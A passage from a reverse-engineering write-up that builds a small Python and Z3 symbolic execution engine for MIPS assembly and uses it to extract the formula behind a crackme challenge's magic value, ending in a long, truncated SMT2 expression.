If you are not really familiar with symbolic execution, I recommend you take a little bit of time to read Breaking Kryptonite's Obfuscation: A Static Analysis Approach Relying on Symbolic Execution and check out z3-playground if you are not really familiar with Z3 and its Python bindings.

This time I decided not to build that engine as an IDA Python script, but to do everything myself. Do not be afraid though ; even if it sounds scary, it really is not: the challenge is a perfect environment for this kind of thing. It doesn't use a lot of instructions, we don't need to support branches, and nearly only arithmetic instructions are used.

I also chose to implement this engine in such a way that we can also use it as a simple emulator. You can even use it as a decompiler if you want! The two other interesting points for us are:

  1. Once we run a piece of code in the symbolic engine, we will extract certain computations / formulas. Thanks to Microsoft's Z3 we will be able to retrieve input values that will generate specific output values: this is basically what you gain by using a solver and symbolic variables.
  2. But the other interesting point is that you can still use the extracted Z3 expressions as some kind of black-box functions. You know what the function is doing, kind of, but you don't know how ; and you are not interested in the how. You know the inputs, and the outputs. To obtain a concrete output value, you can just replace the symbolic variables with concrete values. This is really handy, especially when you are not only interested in finding input values that generate specific output values ; sometimes you just want to go both ways :-) (see the little demo right after this list).
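
Here is that demo ; we will abuse this substitute trick a lot in the rest of the post:

from z3 import BitVec, BitVecVal, substitute, simplify

a = BitVec('a', 32)
formula = a * 3 + 1   # pretend the engine extracted this for us
# No re-execution needed: swap the symbolic variable for a concrete value
print simplify(substitute(formula, (a, BitVecVal(10, 32))))   # 31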

Anyway, after this long theoretical speech, let's have a look at some code. The first important job of the engine is to be able to parse MIPS assembly: fortunately for us, this is really easy. We are feeding plain-text MIPS disassembly, directly copied from IDA, to our engine:

def _parse_line(self, line):
  addr_seg, instr, rest = line.split(None, 2)
  args = rest.split(',')
  for i in range(len(args)):
    if '#' in args[i]:
        args[i], _ = args[i].split(None, 1)

  a0, a1, a2 = map(
    lambda x: x.strip().replace('$', '') if x is not None else x,
    args + [None]*(3 - len(args))
  )
  _, addr = addr_seg.split(':')
  return int(addr, 16), instr, a0, a1, a2
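
To make the parsing concrete, here is what one line of IDA output turns into (x being an instance of the engine ; note that the inline '# Load Word' comment is thrown away and the '$' prefixes are stripped):

addr, instr, a0, a1, a2 = x._parse_line(
  '.text:00400B8C                 lw      $v0, 0x318+pc_son($fp)  # Load Word'
)
# addr = 0x400B8C, instr = 'lw', a0 = 'v0', a1 = '0x318+pc_son(fp)', a2 = None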

From here you have all the information you need: the instruction and its operands (None if an operand doesn't exist, as you can have up to 3 operands). The other important job that follows is to handle the different types of operands ; here are the ones I encountered in the challenge:

  • General purpose register,
  • Stack-variable,
  • Immediate value.

To handle / convert those I created a bunch of dull helper functions:

def _is_gpr(self, x):
  '''Is it a valid GPR name?'''
  return x in self.gpr

def _is_imm(self, x):
  '''Is it a valid immediate?'''
  x = x.replace('loc_', '0x')
  try:
    int(x, 0)
    return True
  except:
    return False

def _to_imm(self, x):
  '''Get an integer from a string immediate'''
  if self._is_imm(x):
    x = x.replace('loc_', '0x')
    return int(x, 0)
  return None

def _is_memderef(self, x):
  '''Is it a memory dereference?'''
  return '(' in x and ')' in x

def is_stackvar(self, x):
  '''Is it a stack variable?'''
  return ('(fp)' in x and '+' in x) or ('var_' in x and '+' in x)

def to_stackvar(self, x):
  '''Get the stack variable name'''
  _, var_name = x.split('+')
  return var_name.replace('(fp)', '')
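
A few quick sanity checks on those helpers (again, x is an engine instance ; remember the operands arrive with their '$' already stripped by _parse_line):

assert x._is_imm('loc_400A78') and x._to_imm('loc_400A78') == 0x400A78
assert x._is_memderef('8(v0)')
assert x.is_stackvar('0x318+pc_son(fp)')
assert x.to_stackvar('0x318+pc_son(fp)') == 'pc_son'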

Finally, we have to handle all the different instructions and their encodings. Of course, you only need to implement the instructions you want: most likely the ones used in the code you are interested in. In a nutshell, this is the core of the engine. You can also use it to output valid Python/C lines if you fancy having a decompiler up your sleeve ; might be handy, right?

This is what the core function looks like ; it is really simple, dumb and totally unoptimized, but at least it's clear to me:

def step(self):
  '''This is the core of the engine -- you are supposed to implement the semantics
  of all the instructions you want to emulate here.'''
  line = self.code[self.pc]
  addr, instr, a0, a1, a2 = self._parse_line(line)
  if instr == 'sw':
    if self._is_gpr(a0) and self.is_stackvar(a1) and a2 is None:
      var_name = self.to_stackvar(a1)
      self.logger.info('%s = $%s', var_name, a0)
      self.stack[var_name] = self.gpr[a0]
    elif self._is_gpr(a0) and self._is_memderef(a1) and a2 is None:
      idx, base = a1.split('(')
      base = base.replace('$', '').replace(')', '')
      computed_address = self.gpr[base] + self._to_imm(idx)
      self.logger.info('[%s + %s] = $%s', base, idx, a0)
      self.mem[computed_address] = self.gpr[a0]
    else:
      raise Exception('sw not implemented')
  elif instr == 'lw':
    if self._is_gpr(a0) and self.is_stackvar(a1) and a2 is None:
      var_name = self.to_stackvar(a1)
      if var_name not in self.stack:
        self.logger.info(' WARNING: Assuming %s was 0', var_name)
        self.stack[var_name] = 0
      self.logger.info('$%s = %s', a0, var_name)
      self.gpr[a0] = self.stack[var_name]
    elif self._is_gpr(a0) and self._is_memderef(a1) and a2 is None:
      idx, base = a1.split('(')
      base = base.replace('$', '').replace(')', '')
      computed_address = self.gpr[base] + self._to_imm(idx)
      if computed_address not in self.mem:
        value = raw_input(' WARNING %.8x is not in your memory store -- what value is there @0x%.8x?' % (computed_address, computed_address))
      else:
        value = self.mem[computed_address]
      self.logger.info('$%s = [%s+%s]', a0, idx, base)
      self.gpr[a0] = value
    else:
      raise Exception('lw not implemented')
[...]

The first level of if handles the different instructions, the second level of if handles the different encodings an instruction can have. The self.logger thingy is just my way of saving the execution traces to files to keep the console clean:

def __init__(self, trace_name):
  self.gpr = {
    'zero' : 0,
    'at' : 0,
    'v0' : 0,
    'v1' : 0,
# [...]
    'lo' : 0,
    'hi' : 0
  }

  self.stack = {}
  self.pc = 0
  self.code = []
  self.mem = {}
  self.stack_offsets = {}
  self.debug = False
  self.enable_z3 = False

  if os.path.exists('traces') == False:
      os.mkdir('traces')

  self.logger = logging.getLogger(trace_name)
  h = logging.FileHandler(
      os.path.join('traces', trace_name),
      mode = 'w'
  )

  h.setFormatter(
      logging.Formatter(
          '%(levelname)s: %(asctime)s %(funcName)s @ l%(lineno)d -- %(message)s',
          datefmt = '%Y-%m-%d %H:%M:%S'
      )
  )

  self.logger.setLevel(logging.INFO)
  self.logger.addHandler(h)

At that point, if I wanted only an emulator I would be done. But because I want to use Z3 and symbolic variables, let me draw your attention to two common pitfalls that can cost you hours of debugging (trust me on that one :-():

  • The first one is that the operator __rshift__ isn't the logical right shift but the arithmetic one, which is quite different and can generate results you don't expect:
In [1]: from z3 import *

In [2]: simplify(BitVecVal(4, 3) >> 1)
Out[2]: 6

In [3]: simplify(LShR(BitVecVal(4, 3), 1))
Out[3]: 2

In [4]: 4 >> 1
Out[4]: 2

To work around that, I usually define my own _LShR function that does whatever is correct according to the operand types (yes, we could also replace z3.BitVecNumRef.__rshift__ by LShR directly):

def _LShR(self, a, b):
  '''Useful hook function if you want to run the emulation
  with/without Z3 as LShR is different from >> in Z3'''
  if self.enable_z3:
    if isinstance(a, long) or isinstance(a, int):
      a = BitVecVal(a, 32)
    if isinstance(b, long) or isinstance(b, int):
      b = BitVecVal(b, 32)
    return LShR(a, b)
  return a >> b
  • The other interesting detail to keep in mind is that you can't have any overflow on BitVecs of the same size ; the result is automatically truncated. So if you happen to have mathematical operations that need to overflow, like a multiplication (this is used in the challenge), you should store the temporary result in a bigger temporary variable. In my case, I was supposed to store the overflow inside another register, $hi, which holds the high DWORD of the result. But because I wasn't storing the result in a bigger BitVec, $hi ended up always equal to zero ; which is quite a nice problem to pinpoint in thousands of lines of assembly :-) (see the little demonstration right after the snippet below).
elif instr == 'multu':
  if self._is_gpr(a0) and self._is_gpr(a1) and a2 is None:
    self.logger.info('$lo = ($%s * $%s) & 0xffffffff', a0, a1)
    self.logger.info('$hi = ($%s * $%s) >> 32', a0, a1)
    if self.enable_z3:
      a0bis, a1bis = self.gpr[a0], self.gpr[a1]
      if isinstance(a0bis, int) or isinstance(a0bis, long):
        a0bis = BitVecVal(a0bis, 32)
      if isinstance(a1bis, int) or isinstance(a1bis, long):
        a1bis = BitVecVal(a1bis, 32)

      # 64-bit temporaries so the multiplication cannot get truncated
      a064 = ZeroExt(32, a0bis)
      a164 = ZeroExt(32, a1bis)
      r = a064 * a164
      self.gpr['lo'] = Extract(31, 0, r)
      self.gpr['hi'] = Extract(63, 32, r)
    else:
      x = self.gpr[a0] * self.gpr[a1]
      self.gpr['lo'] = x & 0xffffffff
      self.gpr['hi'] = self._LShR(x, 32)
  else:
    raise Exception('multu not implemented')
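
You can actually see the truncation, and the ZeroExt fix, in two lines:

In [1]: from z3 import *

In [2]: simplify(BitVecVal(0x80000000, 32) * 2)
Out[2]: 0

In [3]: simplify(ZeroExt(32, BitVecVal(0x80000000, 32)) * 2)
Out[3]: 4294967296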

I think this is it really, you can now impress girls with your brand new shiny toy, check this out:

def main(argc, argv):
    print '=' * 50
    sym = MiniMipsSymExecEngine('donotcare.log')
    # DO NOT FORGET TO ENABLE Z3 :)
    sym.enable_z3 = True
    a = BitVec('a', 32)
    sym.stack['var'] = a
    sym.stack['var2'] = 0xdeadbeef
    sym.stack['var3'] = 0x31337
    sym.code = '''.doare:DEADBEEF                 lw      $v0, 0x318+var($fp)  # Load Word
.doare:DEADBEEF                 lw      $v1, 0x318+var2($fp)  # Load Word
.doare:DEADBEEF                 subu    $v0, $v1, $v0    #
.doare:DEADBEEF                 li      $v1, 0x446F8657  # Load Immediate
.doare:DEADBEEF                 multu   $v0, $v1         # Multiply Unsigned
.doare:DEADBEEF                 mfhi    $v1              # Move From HI
.doare:DEADBEEF                 subu    $v0, $v1         # Subtract Unsigned'''.split('\n')
    sym.run()

    print 'Symbolic mode:'
    print 'Resulting equation: %r' % sym.gpr['v0']
    print 'Resulting value if `a` is 0xdeadb44: %#.8x' % substitute(
        sym.gpr['v0'], (a, BitVecVal(0xdeadb44, 32))
    ).as_long()

    print '=' * 50
    emu = MiniMipsSymExecEngine('donotcare.log')
    emu.stack = sym.stack
    emu.stack['var'] = 0xdeadb44
    emu.stack['var2'] = 0xdeadbeef
    emu.stack['var3'] = 0x31337
    emu.code = sym.code
    emu.run()

    print 'Emulator mode:'
    print 'Resulting value when `a` is 0xdeadb44: %#.8x' % emu.gpr['v0']
    print '=' * 50
    return 1

Which results in:

PS D:\Codes\NoSuchCon2014> python .\mini_mips_symexec_engine.py
==================================================
Symbolic mode:
Resulting equation: 3735928559 +
4294967295*a +
4294967295*
Extract(63,
        32,
        1148159575*Concat(0, 3735928559 + 4294967295*a))
Resulting value if `a` is 0xdeadb44: 0x98f42d24
==================================================
Emulator mode:
Resulting value when `a` is 0xdeadb44: 0x98f42d24
==================================================

Of course, I didn't mention a lot of details that still need to be addressed to have something working: simulating data areas, memory layouts, etc. If you are interested in those, you should read the code in my NoSuchCon2014 folder.

Back into the battlefield

Here come the important bits!

Extracting the function that generates the magic value from the son's program counter

All right, the main objective in this part is to extract the formula that generates the first magic value. As we said earlier, this big block can be seen as a function that takes two arguments (or symbolic variables) and generates the magic DWORD as output. The first thing to do is to copy the code somewhere to feed it to our engine ; I decided to stick all the code I needed into a separate Python file called code.py.

block_generate_magic_from_pc_son = '''.text:00400B8C                 lw      $v0, 0x318+pc_son($fp)  # Load Word
.text:00400B90                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word
.text:00400B94                 la      $v0, loc_400A78  # Load Address
.text:00400B9C                 lw      $v1, 0x318+tmp_pc($fp)  # Load Word
.text:00400BA0                 subu    $v0, $v1, $v0    # (regs.pc_father - 400A78)
.text:00400BA4                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word
.text:00400BA8                 lw      $v0, 0x318+var_300($fp)  # Load Word
.text:00400BAC                 li      $v1, 0x446F8657  # Load Immediate
.text:00400BB4                 multu   $v0, $v1         # Multiply Unsigned
.text:00400BB8                 mfhi    $v1              # Move From HI
.text:00400BBC                 subu    $v0, $v1         # Subtract Unsigned
[...]
.text:00401424                 lw      $v0, 0x318+var_2F0($fp)  # Load Word
.text:00401428                 nor     $v0, $zero, $v0  # NOR
.text:0040142C                 addiu   $v0, 0x20        # Add Immediate Unsigned
.text:00401430                 lw      $a0, 0x318+tmp_pc($fp)  # Load Word
.text:00401434                 sllv    $v0, $a0, $v0    # Shift Left Logical Variable
.text:00401438                 or      $v0, $v1, $v0    # OR
.text:0040143C                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word'''.split('\n')

Then we have to prepare the environment of our engine: the two symbolic variables are stack-variables, so we have to insert them in the context of our virtual environment. The resulting formula is going to be in $v0 at the end of the execution ; this is the holy grail, the formula we are after.

def extract_equation_of_function_that_generates_magic_value():
  '''Here we do some magic to transform our mini MIPS emulator
  into a symbolic execution engine ; the purpose is to extract
  the formula of the function generating the 32-bits magic value'''

  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('function_that_generates_magic_value.log')
  x.debug = False
  x.enable_z3 = True
  pc_son = BitVec('pc_son', 32)
  n_break = BitVec('n_break', 32)
  x.stack['pc_son'] =  pc_son
  x.stack['var_300'] = n_break
  emu_generate_magic_from_son_pc(x, print_final_state = False)
  compute_magic_equation = x.gpr['v0']
  with open(os.path.join('formulas', 'generate_magic_value_from_pc_son.smt2'), 'w') as f:
    f.write(to_SMT2(compute_magic_equation, name = 'generate_magic_from_pc_son'))

  return pc_son, n_break, simplify(compute_magic_equation)

You can now keep the formula in memory & wrap this function in another one so that you can reuse it every time you need it:

var_magic, var_n_break, expr_magic = [None]*3
def generate_magic_from_son_pc_using_z3(pc_son, n_break):
  '''Generates the 32 bits magic value thanks to the output
  of the symbolic execution engine: run the analysis once, extract
  the complete equation & reuse it as much as you want'''
  global var_magic, var_n_break, expr_magic
  if var_magic is None and var_n_break is None and expr_magic is None:
    var_magic, var_n_break, expr_magic = extract_equation_of_function_that_generates_magic_value()

  return substitute(
    expr_magic,
    (var_magic, BitVecVal(pc_son, 32)),
    (var_n_break, BitVecVal(n_break, 32))
  ).as_long()

The power of using symbolic variables here lies in the fact that we don't need to run the emulator every single time we call this function ; we extract the generic formula once and just substitute the symbolic variables with the concrete values we want. This comes for free with our code, so let's use it heh :-). For the curious, here is what the extracted formula looks like:

; generate_magic_from_pc_son
(declare-fun n_break () (_ BitVec 32))
(declare-fun pc_son () (_ BitVec 32))
(let ((?x14 (bvadd n_break (bvmul (_ bv4294967295 32) ((_ extract 63 32) (bvmul (_ bv1148159575 64) (concat (_ bv0 32) n_break)))))))
(let ((?x21 ((_ extract 63 32) (bvmul (_ bv1148159575 64) (concat (_ bv0 32) n_break)))))
(let ((?x8 (bvadd ?x21 (concat (_ bv0 1) ((_ extract 31 1) ?x14)))))
(let ((?x26 ((_ extract 31 6) ?x8)))
(let ((?x24 (bvadd (_ bv32 32) (concat (_ bv63 6) (bvnot ?x26)))))
(let ((?x27 (concat (_ bv0 6) ?x26)))
(let ((?x42 (bvmul (_ bv4294967295 32) ?x27)))
(let ((?x67 ((_ extract 6 6) ?x8)))
(let ((?x120 ((_ extract 7 6) ?x8)))
(let ((?x38 (concat (bvadd (_ bv30088 15) ((_ extract 14 0) pc_son)) ((_ extract 31 15) (bvadd (_ bv4290770312 32) pc_son)))))
(let ((?x41 (bvxor (bvadd (bvor (bvlshr ?x38 (bvadd (_ bv1 32) ?x27)) (bvshl ?x38 ?x24)) ?x42) ?x27)))
(let ((?x63 (bvor ((_ extract 0 0) (bvlshr ?x38 (bvadd (_ bv1 32) ?x27))) ((_ extract 0 0) (bvshl ?x38 ?x24)))))
(let ((?x56 (concat (bvadd (_ bv1 1) (bvxor (bvadd ?x63 ?x67) ?x67)) ((_ extract 31 1) (bvadd (_ bv2142377237 32) ?x41)))))
(let ((?x66 (concat (bvadd ((_ extract 9 1) (bvadd (_ bv2142377237 32) ?x41)) ((_ extract 14 6) ?x8)) ((_ extract 31 31) (bvadd ?x56 ?x27)) ((_ extract 30 9) (bvadd ((_ extract 31 1) (bvadd (_ bv2142377237 32) ?x41)) (concat (_ bv0 5) ?x26))))))
(let ((?x118 (bvor ((_ extract 1 0) (bvshl ?x66 (bvadd (_ bv1 32) ?x27))) ((_ extract 1 0) (bvlshr ?x66 ?x24)))))
(let ((?x122 (bvnot (bvadd ?x118 ?x120))))
(let ((?x45 (bvadd (bvor (bvshl ?x66 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x66 ?x24)) ?x27)))
(let ((?x76 ((_ extract 4 2) ?x45)))
(let ((?x110 (bvnot ((_ extract 5 5) ?x45))))
(let ((?x55 ((_ extract 8 6) ?x45)))
(let ((?x108 (bvnot ((_ extract 10 9) ?x45))))
(let ((?x78 ((_ extract 13 11) ?x45)))
(let ((?x106 (bvnot ((_ extract 14 14) ?x45))))
(let ((?x80 ((_ extract 15 15) ?x45)))
(let ((?x104 (bvnot ((_ extract 16 16) ?x45))))
(let ((?x123 (concat (bvnot ((_ extract 31 29) ?x45)) ((_ extract 28 28) ?x45) (bvnot ((_ extract 27 27) ?x45)) ((_ extract 26 26) ?x45) (bvnot ((_ extract 25 25) ?x45)) ((_ extract 24 24) ?x45) (bvnot ((_ extract 23 21) ?x45)) ((_ extract 20 20) ?x45) (bvnot ((_ extract 19 18) ?x45)) ((_ extract 17 17) ?x45) ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))
(let ((?x50 (concat (bvnot ((_ extract 30 29) ?x45)) ((_ extract 28 28) ?x45) (bvnot ((_ extract 27 27) ?x45)) ((_ extract 26 26) ?x45) (bvnot ((_ extract 25 25) ?x45)) ((_ extract 24 24) ?x45) (bvnot ((_ extract 23 21) ?x45)) ((_ extract 20 20) ?x45) (bvnot ((_ extract 19 18) ?x45)) ((_ extract 17 17) ?x45) ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))
(let ((?x91 (bvadd (_ bv1720220585 32) (concat (bvnot (bvadd (_ bv612234822 31) ?x50)) (bvnot ((_ extract 31 31) (bvadd (_ bv612234822 32) ?x123)))) ?x42)))
(let ((?x137 (bvnot (bvadd (_ bv128582 17) (concat ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))))
(let ((?x146 (bvadd (_ bv31657 18) (concat ?x137 (bvnot ((_ extract 31 31) (bvadd (_ bv612234822 32) ?x123)))) (bvmul (_ bv262143 18) ((_ extract 23 6) ?x8)))))
(let ((?x131 (bvadd (_ bv2800103692 32) (concat ?x146 ((_ extract 31 18) ?x91)))))
(let ((?x140 (concat ((_ extract 18 18) ?x91) ((_ extract 31 31) ?x131) (bvnot ((_ extract 30 30) ?x131)) ((_ extract 29 27) ?x131) (bvnot ((_ extract 26 25) ?x131)) ((_ extract 24 24) ?x131) (bvnot ((_ extract 23 22) ?x131)) ((_ extract 21 21) ?x131) (bvnot ((_ extract 20 20) ?x131)) ((_ extract 19 19) ?x131) (bvnot ((_ extract 18 17) ?x131)) ((_ extract 16 14) ?x131) (bvnot ((_ extract 13 9) ?x131)) ((_ extract 8 8) ?x131) (bvnot ((_ extract 7 6) ?x131)) ((_ extract 5 4) ?x131) (bvnot ((_ extract 3 1) ?x131)))))
(let ((?x176 (bvnot (bvadd (concat ((_ extract 4 4) ?x131) (bvnot ((_ extract 3 1) ?x131))) ((_ extract 9 6) ?x8)))))
(let ((?x177 (bvadd (concat ?x176 (bvnot ((_ extract 31 4) (bvadd ?x140 ?x27)))) ?x42)))
(let ((?x187 (bvadd (bvnot ((_ extract 13 4) (bvadd ?x140 ?x27))) (bvmul (_ bv1023 10) ((_ extract 15 6) ?x8)))))
(let ((?x180 (concat (bvadd ((_ extract 23 10) ?x177) (bvmul (_ bv16383 14) ((_ extract 19 6) ?x8))) ((_ extract 31 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)))))
(let ((?x79 (bvadd (bvxor (bvadd ?x180 ?x27) ?x27) ?x42)))
(let ((?x211 (concat (bvadd ((_ extract 17 10) ?x177) (bvmul (_ bv255 8) ((_ extract 13 6) ?x8))) ((_ extract 31 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)))))
(let ((?x190 (concat (bvnot (bvadd (bvxor (bvadd ?x211 ?x26) ?x26) (bvmul (_ bv67108863 26) ?x26))) (bvnot ((_ extract 31 26) ?x79)))))
(let ((?x173 (bvadd (bvnot (bvadd (_ bv3113082326 32) ?x190 ?x27)) ?x27)))
(let ((?x174 ((_ extract 9 6) ?x8)))
(let ((?x255 ((_ extract 2 2) (bvadd (bvnot (bvadd (_ bv6 4) (bvnot ((_ extract 29 26) ?x79)) ?x174)) ?x174))))
(let ((?x253 ((_ extract 3 3) (bvadd (bvnot (bvadd (_ bv6 4) (bvnot ((_ extract 29 26) ?x79)) ?x174)) ?x174))))
(let ((?x144 ((_ extract 23 6) ?x8)))
(let ((?x233 ((_ extract 17 6) ?x8)))
(let ((?x235 (bvxor (bvadd ((_ extract 25 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)) ?x233) ?x233)))
(let ((?x244 (bvadd (_ bv122326 18) (concat (bvnot (bvadd ?x235 (bvmul (_ bv4095 12) ?x233))) (bvnot ((_ extract 31 26) ?x79))) ?x144)))
(let ((?x246 (bvadd (bvnot ?x244) ?x144)))
(let ((?x293 (concat (bvnot ((_ extract 24 23) ?x173)) ((_ extract 22 18) ?x173) ((_ extract 17 17) ?x246) (bvnot ((_ extract 16 16) ?x246)) ((_ extract 15 15) ?x246) (bvnot ((_ extract 14 12) ?x246)) ((_ extract 11 10) ?x246) (bvnot ((_ extract 9 9) ?x246)) ((_ extract 8 8) ?x246) (bvnot ((_ extract 7 7) ?x246)) ((_ extract 6 6) ?x246) (bvnot ((_ extract 5 4) ?x246)) (bvnot ?x253) ?x255 (bvnot (bvadd (bvnot (bvadd (_ bv2 2) (bvnot ((_ extract 27 26) ?x79)) ?x120)) ?x120)) (bvnot ((_ extract 31 29) ?x173)) ((_ extract 28 28) ?x173) (bvnot ((_ extract 27 26) ?x173)) ((_ extract 25 25) ?x173))))
(let ((?x324 (bvor ((_ extract 0 0) (bvshl ?x293 (bvadd (_ bv1 32) ?x27))) ((_ extract 0 0) (bvlshr ?x293 ?x24)))))
(let ((?x202 (bvadd (bvor (bvshl ?x293 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x293 ?x24)) ?x27)))
(let ((?x261 (concat ((_ extract 31 31) ?x202) (bvnot ((_ extract 30 29) ?x202)) ((_ extract 28 27) ?x202) (bvnot ((_ extract 26 25) ?x202)) ((_ extract 24 22) ?x202) (bvnot ((_ extract 21 18) ?x202)) ((_ extract 17 17) ?x202) (bvnot ((_ extract 16 15) ?x202)) ((_ extract 14 13) ?x202) (bvnot ((_ extract 12 12) ?x202)) ((_ extract 11 7) ?x202) (bvnot ((_ extract 6 5) ?x202)) ((_ extract 4 2) ?x202) (bvnot ((_ extract 1 1) ?x202)) (bvadd ?x324 ?x67))))
(let ((?x250 (concat ((_ extract 11 7) ?x202) (bvnot ((_ extract 6 5) ?x202)) ((_ extract 4 2) ?x202) (bvnot ((_ extract 1 1) ?x202)) (bvadd ?x324 ?x67))))
(let ((?x331 (bvadd (_ bv1397077939 32) (concat (bvadd (_ bv4018 12) ?x250) ((_ extract 31 12) (bvadd (_ bv1471406002 32) ?x261))) ?x27)))
(let ((?x264 (bvor (bvshl (bvadd (bvnot ?x331) ?x27) (bvadd (_ bv1 32) ?x27)) (bvlshr (bvadd (bvnot ?x331) ?x27) ?x24))))
(let ((?x298 (bvor (bvshl (bvadd (_ bv1031407080 32) ?x264 ?x42) (bvadd (_ bv1 32) ?x27)) (bvlshr (bvadd (_ bv1031407080 32) ?x264 ?x42) ?x24))))
(let ((?x231 (bvor ((_ extract 31 17) (bvshl ?x298 (bvadd (_ bv1 32) ?x27))) ((_ extract 31 17) (bvlshr ?x298 ?x24)))))
(let ((?x220 (bvor ((_ extract 16 0) (bvshl ?x298 (bvadd (_ bv1 32) ?x27))) ((_ extract 16 0) (bvlshr ?x298 ?x24)))))
(let ((?x283 (bvor (bvshl (concat ?x220 ?x231) (bvadd (_ bv1 32) ?x27)) (bvlshr (concat ?x220 ?x231) ?x24))))
(let ((?x119 (bvadd (_ bv4200859627 32) (bvnot (bvor (bvshl ?x283 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x283 ?x24))))))
(let ((?x201 (bvshl ?x119 ?x24)))
(let ((?x405 (bvadd (bvor ((_ extract 10 8) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 10 8) ?x201)) ((_ extract 8 6) ?x8))))
(let ((?x343 (concat (bvor ((_ extract 7 0) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 7 0) ?x201)) (bvor ((_ extract 31 8) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 31 8) ?x201)))))
(let ((?x199 (bvadd (_ bv752876532 32) (bvnot (bvadd ?x343 ?x27)) ?x27)))
(let ((?x409 (concat ((_ extract 31 29) ?x199) (bvnot ((_ extract 28 28) ?x199)) ((_ extract 27 27) ?x199) (bvnot ((_ extract 26 26) ?x199)) ((_ extract 25 25) ?x199) (bvnot ((_ extract 24 24) ?x199)) ((_ extract 23 23) ?x199) (bvnot ((_ extract 22 22) ?x199)) ((_ extract 21 21) ?x199) (bvnot ((_ extract 20 19) ?x199)) ((_ extract 18 18) ?x199) (bvnot ((_ extract 17 17) ?x199)) ((_ extract 16 16) ?x199) (bvnot ((_ extract 15 15) ?x199)) ((_ extract 14 11) ?x199) (bvnot ((_ extract 10 10) ?x199)) ((_ extract 9 9) ?x199) (bvnot ((_ extract 8 7) ?x199)) ((_ extract 6 6) ?x199) (bvnot ((_ extract 5 4) ?x199)) ((_ extract 3 3) ?x199) (bvnot (bvadd (_ bv4 3) (bvnot ?x405) ((_ extract 8 6) ?x8))))))
(let ((?x342 (bvlshr (bvadd (_ bv330202175 32) ?x409) ?x24)))
(let ((?x20 (bvadd (_ bv1 32) ?x27)))
(let ((?x337 (bvshl (bvadd (_ bv330202175 32) ?x409) ?x20)))
(let ((?x354 (bvadd (_ bv651919116 32) (bvor ?x337 ?x342))))
(let ((?x414 (concat (bvnot ((_ extract 26 26) ?x354)) ((_ extract 25 25) ?x354) (bvnot ((_ extract 24 24) ?x354)) (bvnot ((_ extract 23 23) ?x354)) ((_ extract 22 22) ?x354) (bvnot ((_ extract 21 21) ?x354)) (bvnot ((_ extract 20 18) ?x354)) ((_ extract 17 13) ?x354) (bvnot ((_ extract 12 10) ?x354)) ((_ extract 9 8) ?x354) (bvnot ((_ extract 7 7) ?x354)) ((_ extract 6 5) ?x354) (bvnot ((_ extract 4 4) ?x354)) (bvnot ((_ extract 3 3) ?x354)) (bvnot ((_ extract 2 2) ?x354)) (bvor ((_ extract 1 1) ?x337) ((_ extract 1 1) ?x342)) (bvnot (bvor ((_ extract 0 0) ?x337) ((_ extract 0 0) ?x342))) (bvnot ((_ extract 31 31) ?x354)) ((_ extract 30 30) ?x354) (bvnot ((_ extract 29 28) ?x354)) ((_ extract 27 27) ?x354))))
(let ((?x464 (concat ((_ extract 22 22) ?x354) (bvnot ((_ extract 21 21) ?x354)) (bvnot ((_ extract 20 18) ?x354)) ((_ extract 17 13) ?x354) (bvnot ((_ extract 12 10) ?x354)) ((_ extract 9 8) ?x354) (bvnot ((_ extract 7 7) ?x354)) ((_ extract 6 5) ?x354) (bvnot ((_ extract 4 4) ?x354)) (bvnot ((_ extract 3 3) ?x354)) (bvnot ((_ extract 2 2) ?x354)) (bvor ((_ extract 1 1) ?x337) ((_ extract 1 1) ?x342)) (bvnot (bvor ((_ extract 0 0) ?x337) ((_ extract 0 0) ?x342))) (bvnot ((_ extract 31 31) ?x354)) ((_ extract 30 30) ?x354) (bvnot ((_ extract 29 28) ?x354)) ((_ extract 27 27) ?x354))))
(let ((?x474 (concat (bvadd (_ bv141595581 28) (bvnot (bvxor (bvadd (_ bv178553293 28) ?x464) (concat (_ bv0 2) ?x26)))) ((_ extract 31 28) (bvadd (_ bv4168127421 32) (bvnot (bvxor (bvadd (_ bv2594472397 32) ?x414) ?x27)))))))
(let ((?x495 (bvadd (_ bv1994801052 32) (bvxor (_ bv1407993787 32) (bvor (bvshl ?x474 ?x20) (bvlshr ?x474 ?x24)) ?x27) ?x42)))
(let ((?x392 (concat (bvor ((_ extract 13 0) (bvlshr ?x495 ?x20)) ((_ extract 13 0) (bvshl ?x495 ?x24))) (bvor ((_ extract 31 14) (bvlshr ?x495 ?x20)) ((_ extract 31 14) (bvshl ?x495 ?x24))))))
(let ((?x388 (bvlshr ?x392 ?x24)))
